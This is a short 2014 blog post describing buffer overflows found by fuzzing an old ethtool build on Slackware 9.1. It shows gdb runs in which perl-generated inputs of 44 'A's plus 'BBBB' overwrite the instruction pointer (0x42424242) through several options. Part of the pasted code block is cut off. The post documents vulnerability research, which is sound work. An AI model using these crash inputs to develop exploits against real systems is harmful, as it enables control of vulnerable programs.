Friday, 11 April 2014

[EN] Old-school buffer overflow - ethtool

During last days I was checking some old apps for Slackware 9.1.My goal was to find some useful bugs to write few exploits (just for practice of course).During simple fuzzing, I found that 'ethtool' is vulnerable in few places to buffer overflow.Below is a short note from testing (overflow in '-k' param):---<code>---tester@box:~/code/tests/ethtool-3 $ head READMEethtool is a small utility for examining and tuning your ethernet-basednetwork interface. See the man page for more details.tester@box:~/code/tests/ethtool-3 $ head NEWS

Program received signal SIGSEGV, Segmentation fault.0x42424242 in ?? ()(gdb) r -r ` perl -e 'print "A"x44,"BBBB"'`The program being debugged has been started already.Start it from the beginning? (y or n) y

Program received signal SIGSEGV, Segmentation fault.0x42424242 in ?? ()(gdb) r -p ` perl -e 'print "A"x44,"BBBB"'`The program being debugged has been started already.Start it from the beginning? (y or n) y

Program received signal SIGSEGV, Segmentation fault.0x42424242 in ?? ()(gdb) r -t ` perl -e 'print "A"x44,"BBBB"'`The program being debugged has been started already.Start it from the beginning? (y or n) y

Program received signal SIGSEGV, Segmentation fault.0x42424242 in ?? ()(gdb) r -s ` perl -e 'print "A"x44,"BBBB"'`The program being debugged has been started already.Start it from the beginning? (y or n) y